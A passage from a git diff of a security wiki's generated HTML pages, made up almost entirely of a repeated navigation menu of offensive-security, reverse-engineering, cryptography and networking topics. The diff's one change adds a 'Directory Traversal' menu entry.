        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -177,22 +177,6 @@

Introduction - - diff --git a/docs/Cryptography/Private-Key Cryptography/Authenticated Encryption/index.html b/docs/Cryptography/Private-Key Cryptography/Authenticated Encryption/index.html index d1eb6cd7..080da3a2 100644 --- a/docs/Cryptography/Private-Key Cryptography/Authenticated Encryption/index.html +++ b/docs/Cryptography/Private-Key Cryptography/Authenticated Encryption/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -268,22 +268,6 @@

Encrypt-t - - diff --git a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Advanced Encryption Standard (AES).html b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Advanced Encryption Standard (AES).html index 45be89ad..371bef77 100644 --- a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Advanced Encryption Standard (AES).html +++ b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Advanced Encryption Standard (AES).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -212,22 +212,6 @@

Decryption

- - diff --git a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Encrypting Non-Conforming Messages.html b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Encrypting Non-Conforming Messages.html index 4eaa59fe..bd77e299 100644 --- a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Encrypting Non-Conforming Messages.html +++ b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Encrypting Non-Conforming Messages.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
